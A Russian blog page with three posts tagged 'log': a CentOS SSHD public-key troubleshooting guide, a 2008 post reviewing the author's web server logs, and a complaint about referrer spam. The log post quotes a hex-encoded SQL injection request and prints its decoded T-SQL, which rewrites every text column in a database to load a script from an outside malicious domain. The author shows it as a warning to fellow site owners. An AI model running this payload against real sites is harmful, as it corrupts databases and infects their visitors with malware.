Показаны сообщения с ярлыком лог. Показать все сообщения
Показаны сообщения с ярлыком лог. Показать все сообщения

11 дек. 2014 г.

Как чинить проблемы SSHD в Centos 6

Как чинить проблемы SSHD

Если ваша Путти внезапнно вместо логина на сервер по паре ключей пишет в консоли:

Using username "root".
Server refused our key
root@8.8.8.8's password:

А в логе путти вы видите:
2014-12-10 12:17:15 Offered public key
2014-12-10 12:17:15 Server refused our key
2014-12-10 12:17:15 Using SSPI from SECUR32.DLL
2014-12-10 12:17:15 Attempting GSSAPI authentication
2014-12-10 12:17:16 GSSAPI authentication request refused

Это значит, что: караул, меня взломали, я разорен или что настала пора что-то полечить.

1. если вы раньше отключали ведение логов для экономии ресурсов, то нужно убедиться в том, что сейчас работает демон rsyslogd, без него не пишется /var/log/secure и следовательно не работает fail2ban между прочим
# ps axfu
где-то есть такое /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
service rsyslog start
chkconfig rsyslog on
2. включить дебаг лога SSHD
\etc\ssh\sshd_config
разремить или добавить
LogLevel DEBUG3
в районе
#LogLevel INFO
3. За одно проверить
#AuthorizedKeysFile .ssh/authorized_keys
обратите внимание, что путь будет строиться от домашнего каталога юзера! Вам тут исправлять вот так
AuthorizedKeysFile /root/.ssh_t/authorized_keys
не нужно!
4. читать логи, если там есть
key_type_from_name: unknown key type 'ssh-dsa'
key_read: missing keytype
то внимательно проверить файл с публичным ключем, в моем случае было ssh-dsa.... вместо ssh-dss....
а если бы я выбрал ключик попроще RSA, то такой проблемы не было бы :)
желательно в конце ключа через пробел после == дописать что-то типа john@example.net
5. Вывод - выбирайте тип RSA и генерируйте ключи на сервере, потому что при переносе ключа из Putty в \root\.ssh\authorized_keys больше шансов ошибиться, чем при скачивании приватного ключа с сервера на локальный комп.
5. Инструкция
Создаем папку
$ mkdir ~/.ssh
$ chmod 700 ~/.ssh
Генерируем ключи
$ ssh-keygen -t rsa
и три раза Энтер
Создаст
~/.ssh/id_rsa приватный ключ
~/.ssh/id_rsa.pub публичный ключ
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
$ chmod 600 ~/.ssh/authorized_keys
Теперь нужно стащить ~/.ssh/id_rsa (приватный ключ) в программу puttygen.exe и сохранить в формате Путти. Потом подключить к Путти...
Проверим права и владельцев по всему пути
namei -om /root/.ssh
SSHD строго следит за минимально необходимыми правами. Ставить везде 777 и 666 нельзя.
Если это ВДС под OpenVZ, то потребуется восстановить владельца:
restorecon -Rv /root/.ssh
Припрячем ключ на будущее
$ chmod 600 ~/.ssh/id_rsa
Или уберем за собой, смотря кому как нужно
rm ~/.ssh/id_rsa
rm ~/.ssh/id_rsa.pub


Полезное чтиво http://wiki.centos.org/HowTos/Network/SecuringSSH Прочитать полностью...

23 сент. 2008 г.

Про серверные логи. Пост ни о чем.

Пост ни о чем, т.е. о том как я заглянул в серверные логи, а там и хакеры и спамилки и ботов тучи. Сайту месяц от роду. В принципе это чтение пустая трата времени, мне было интересно и поучительно в свете вчерашнего скана от wordpress.com.

Значит смотрю я логи своего нового сайта. Гугл его любит, поэтому встречаются такие запросы:

66.249.71.100 - - [20/Sep/2008:16:52:34 -0700] "GET /hyqrcywr.html HTTP/1.1" 404 32059 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Страницы hyqrcywr.html на сайте нет. Это гуглоробот проверяет, как у меня 404 отрабатывается.

А вот нахеры что-то мутят:
59.160.78.130 - - [20/Sep/2008:06:20:58 -0700] "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44_тут было 1220 шестнадцатеричных цифр_72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 404 22522 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"

Через четыре секунды повтор. Под 1224 цифрами был зашит текст (квадратнные скобки заменить на угловые)

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"][/title][script src="http://www3.ss11qn.cn/csrss/w.js"][/script][!--''+['+@C+'] where '+@C+' not like ''%"][/title][script src="http://www3.ss11qn.cn/csrss/w.js"][/script][!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Рекомендую проверить свои мускли на предмет этого ss11qn.cn, на сайте нортон сейф вэба он есть:
ss11qn.cn
Summary

  • Threats to your computer: 19
  • Threats to your identity: 0
  • Nuisance factors: 0
Total threats on this site: 19


А вот и спамилка появилась:

Вот она нашла мой сайт
217.169.46.98 - - [18/Sep/2008:10:42:48 -0700] "GET /county-florida.html HTTP/1.1" 200 41080 "-" "Mozilla/4.0"

Через два дня пришла спамить с разных айпишников. Только форма оказалась не типовая :)
217.169.46.98 - - [20/Sep/2008:09:07:54 -0700] "GET /s-guidebook.html HTTP/1.1" 200 42619 "-" "Mozilla/4.0"
168.187.216.238 - - [20/Sep/2008:09:07:58 -0700] "GET /s-guidebook.html HTTP/1.1" 200 42619 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.169.46.98 - - [20/Sep/2008:09:08:01 -0700] "GET /Sign-Up.php HTTP/1.1" 404 36721 "-" "Mozilla/4.0"
168.187.216.238 - - [20/Sep/2008:09:08:03 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36870 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
75.94.46.82 - - [20/Sep/2008:09:08:09 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36779 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
71.226.210.20 - - [20/Sep/2008:09:08:12 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36835 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.180.79.94 - - [20/Sep/2008:09:08:17 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36690 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.62.202.151 - - [20/Sep/2008:09:08:21 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36724 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Всё отдохнул, пошел дальше работать. И вам успехов желаю.
Прочитать полностью...

18 мар. 2008 г.

Сервис Profit-project (профессиональный Центр Обслуживания Партнеров Рекламной Сети Яндекс) занимается рефспамом.

Сервис Profit-project (профессиональный Центр Обслуживания Партнеров Рекламной Сети Яндекс) занимается рефспамом.
Вот строка из моего серверного лога:

82.146.41.77 - - [17/Mar/2008:04:30:00 -0700] "GET / HTTP/1.1" 200 17702 "http://profit-project.su/" "-"

Линков с их морды на мою аптеку я что-то не заметил :)

А на сайте пишут красиво:

Мы позиционируем себя на рынке как динамичный и постоянно развивающийся проект, удовлетворяющий любые запросы вебмастеров. Основное правило нашей программы — делать Вашу работу комфортнее и прибыльнее. Мы не считаем Ваш трафик и не предоставляем услуги хостинга - все наши усилия нацелены на максимально эффективное обслуживание Ваших прибылей.

Других заходов с этого ИПа в предыдущие 7 дней не было ни одного

По этому ИПу открывается прикольный сайт "USAMA BIN LADEN - Aliases: Usama Bin Muhammad Bin Ladin, Shaykh Usama Bin Ladin, The Prince, The Emir, Abu Abdallah, Mujahid Shaykh, Hajj, The Director............SHOULD BE CONSIDERED ARMED AND DANGEROUS. IF YOU HAVE ANY INFORMATION CONCERNING THIS PERSON, PLEASE CONTACT YOUR LOCAL FBI OFFICE OR THE NEAREST AMERICAN EMBASSY OR CONSULATE."

Там тоже нет линков на мою аптеку :)

Прочитать полностью...